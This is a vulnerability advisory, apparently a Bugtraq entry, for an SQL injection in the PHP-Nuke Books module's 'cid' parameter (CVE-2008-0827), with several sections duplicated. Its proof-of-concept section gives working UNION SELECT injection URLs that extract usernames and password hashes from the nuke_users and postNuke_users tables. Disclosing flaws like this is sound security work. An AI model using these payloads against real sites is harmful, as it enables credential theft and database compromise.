PHP-Nuke Books Module 'cid' Parameter SQL Injection Vulnerability
BID:27863
Info
PHP-Nuke Books Module 'cid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 27863 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0827 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 18 2008 12:00AM |
| Updated: | May 07 2015 05:32PM |
| Credit: | S@BUN is credited with the discovery of this vulnerability. |
| Vulnerable: |
PHP-Nuke Books 0 |
| Not Vulnerable: | |
Discussion
PHP-Nuke Books Module 'cid' Parameter SQL Injection Vulnerability
PHP-Nuke Books module is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
PHP-Nuke Books module is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
PHP-Nuke Books Module 'cid' Parameter SQL Injection Vulnerability
An attacker can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201
http://www.example.com/modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201
An attacker can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201
http://www.example.com/modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201
Solution / Fix
PHP-Nuke Books Module 'cid' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP-Nuke Books Module 'cid' Parameter SQL Injection Vulnerability
References:
References:
- PHP-Nuke Homepage (PHP-Nuke)